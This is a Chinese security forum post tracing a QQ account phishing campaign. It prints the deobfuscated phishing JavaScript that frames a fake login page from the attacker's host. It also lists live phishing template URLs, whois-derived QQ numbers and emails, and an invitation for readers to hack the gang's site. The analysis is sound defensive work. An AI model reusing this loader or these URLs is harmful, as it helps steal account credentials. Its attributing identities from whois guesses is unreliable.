精华 QQ钓鱼样本不完全溯源
发布于 5 个月前 阅读权限 无需登录 作者 1024 1825 次浏览 来自 攻击溯源

起因

今天收到一封带有附件名为“邀请函”的可疑邮件,解压后发现是一个PE文件,以为有人要搞我呢,就把文件下载下来分析一下。

分析过程

邮件的附件名为邀请函,解压后发现是一个自解压文件,如图: untitled1.png 通过右键解压后,发现里面是一个邀请函.html文件;如图: untitled2.png 通过文本文件打开该文件,发现里面不会有什么恶意代码,就在虚拟机打开了这个文件,发现是一个伪装邀请函的静态页面,大意是,“我给你发的邀请函已经加密了,你点开下面的连接去查看”,诱导我去点击页面最下面的超链接,如图: untitled3.png 于是我就点开了该连接,发现会跳转到该地址: hxxp://www.zslosam.com/index_ck.html?qq.com?x=dXNlcj05TmFOOVpkUXBMNQ==&index2=1,发现是一个假冒的QQ邮箱的登陆页面,才知道这是一个想钓我QQ账号和密码的钓鱼邮件: untitled4.png 该钓鱼链接的域名是一个合法的网站,可能是为了不被杀毒软件或者浏览器报出是钓鱼页面的原因吧,下图是该域名主站,是一个经营轮子的网站: untitled5.png 这网站应该是一个正常的网站,被黑客入侵后,放了恶意的页面“index_ck.html”, 后面跟的参数“dXNlcj05TmFOOVpkUXBMNQ== ”是base64编码的,解出来为:“user=9NaN9ZdQpL5”,很显然是钓鱼者的用户ID; 于是就把index_ck.html下载下来,里面直接内嵌script脚本,它会拼出一个脚本嵌入到html页面中,然后执行该脚本,如图: untitled6.png 拼出来的脚本地址为:hxxp://www.qq11249944.com/2.js 然后把2.js下载下来,如图: untitled7.png 两种混合编码的文件,转换成统一编码后,内容为: untitled8.png untitled9.png 下载下来这个SADS2DA223.js脚本,如图: untitled10.png 转换成字符串后,里面又包含一层,如图: untitled11.png 又解开一层如下: untitled12.png 18784112.js是用51.la统计访客信息的脚本,1as12.js是钓鱼的js脚本, 如下图,51.la的统计ID为:18784112,并不是用户的ID, 该统计ID对应的网站访问量没对外公开,所以需要输入密码才能查看: untitled13.png 钓鱼的JS(hxxp://www.qq11249944.com/1as12.js)的脚本代码如下: untitled14.png 通过chrome去调试js脚本,得到去混淆的代码如下,该脚本会判断参数中是否包含”?qq.com?”,如果没有的话,跳转到baidu:

var aoa, bob, str, para, url;
str = window.location.href;
aoa = str.indexOf("?qq.com?");
bob = str.indexOf("ldtest");
url = str.substring(aoa + 8);
if (0 < aoa) {
    0 < bob && document.writeln("<meta name='viewport' content='width=device-width, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no' />");
    n = "hxxp://www.qq11249944.com/admin/rss.php?";
    j1 = n + url;
    b = c = '<html><head><style>html{overflow:hidden;}body{height:100%;margin:0px;}</style></head><body scroll="no">';
    a = '<iframe name="main"  height="100%" src="';
    k1 = '" width="100%"  frameborder="0"></iframe>';
    var d = window.frames[0];
    d.document.write(c + b + a + j1 + k1)
} else location.href = "hxxp://www.baidu.com";

按照上面拼出来的内容为:

<html>
 <head>
  <meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no" /> 
  <style>html{overflow:hidden;}body{height:100%;margin:0px;}</style>
 </head>
 <body scroll="no">
  <style>html{overflow:hidden;}body{height:100%;margin:0px;}</style>
  <iframe name="main" height="100%" src=" hxxp://www.qq11249944.com/admin/rss.php? x=dXNlcj05TmFOOVpkUXBMNQ==&amp;index2=1" width="100%" frameborder="0"></iframe>
 </body>
</html>

保存为html,打开后,发现界面如下: untitled15.png 当我输入账号密码后,发现会把账号密码发送到uk.feifanke.net服务器,如图: untitled17.png 通过nslookup查看发送密码的域名,发现cname是www.qq11249944.com,如图: untitled18.png 从这报错可以看出来服务器用的是windows系统,用的phpStudy架设的php环境,目录在E盘的phpStudy目录下,如下: untitled19.png qq11249944.com域名的whois信息如下: untitled20.png 该域名的DNS服务器在新网,就去xinnet查询whois,发现一个QQ号:983351068@qq.com untitled21.png 这人注册过好多这样的域名,所以该域名字面的QQ和留下的whois的QQ邮箱应该都不是幕后的人: untitled22.png uk.feifanke.net的whois信息,注册邮箱为:1499901388@qq.com,如图: untitled23.png 发现feifanke.net是一个虚拟主机提供商,如图: untitled24.png 而钓鱼的人为啥会有feifanke.net的子域名呢?很有可能是该域名的子域名被盗用了,为了躲避安全软件的防钓鱼系统: untitled25.png www.ukapico.com域名的whois信息显示该域名的注册人的QQ小号为2492892723,这个QQ号的主人应该就是后面做QQ钓鱼系统的人,但是通过搜索引擎搜这个QQ发现没有东西: untitled26.png 下图为该域名注册人的QQ截图: untitled27.png 该域名下有管理员管理入口: http://www.ukapico.com/admin/ untitled28.png 而用上面2个域名被服务器都给重定向到了baidu,估计这个域名应该只是为钓鱼用户准备的域名。 untitled29.png 登陆提示账号已经过期,弹出界面让续费,估计所有登陆失败都会显示这个对话框: untitled30.png 发送的数据包如下图: untitled31.png 想了各种方法还是进不去,只能怪自己web渗透技术太菜,大牛们可以把这站X下来。。 还有另外一些钓鱼模板,如图: QQ相册: untitled32.png 中国留学网钓鱼图片,专门诈骗留学生: untitled33.png 财务空间,专门诈骗财务人员: untitled34.png

总结

他们通过钓鱼诈骗的人员,通过目标群体的不同,使用不同的模板诈骗,然后把文件投递到群空间或者直接邮件投递,如果钓到QQ账号密码的话,就会根据不同受害者用不同的剧本去诈骗。

一些线索

域名相关 团伙域名: www.ukapico.com 钓鱼平台使用用户专用域名 uk.feifanke.net 钓鱼域名(盗用feifanke.net的子域名) www.qq11249944.com 钓鱼域名 被黑域名: www.zslosam.com 样本MD5: 0023fef24cf4af31d83f754b68e19237

一些模板URL: http://uk.feifanke.net/_tpl/1/01/index.php?user=9NaN9Zd http://uk.feifanke.net/_tpl/2/6/win_files/1.jpg http://uk.feifanke.net/_tpl/2/7/win_files/1.jpg http://uk.feifanke.net/_tpl/2/8/win_files/1.jpg http://uk.feifanke.net/_tpl/2/10/win_files/1.jpg http://uk.feifanke.net/_tpl/2/1/win_files/1.jpg http://uk.feifanke.net/_tpl/2/2/win_files/1.jpg http://uk.feifanke.net/_tpl/2/3/win_files/1.jpg http://uk.feifanke.net/_tpl/2/4/win_files/1.jpg http://uk.feifanke.net/_tpl/2/5/win_files/1.jpg http://uk.feifanke.net/_tpl/2/11/win_files/1.jpg

10 回复

中间whois那段是个亮点,也开拓了一个思路,感谢大哥分享,学习了。鉴于大哥想深藏功与名,就不点名感谢了。

这个作者好牛逼~

这些白条XSS在黑市很赚钱!

在哪个网站可以查询指定邮箱注册过的域名?

看师傅们的分享是一种享受

貌似在哪见过

思路不错,作者6到不行额。

回到顶部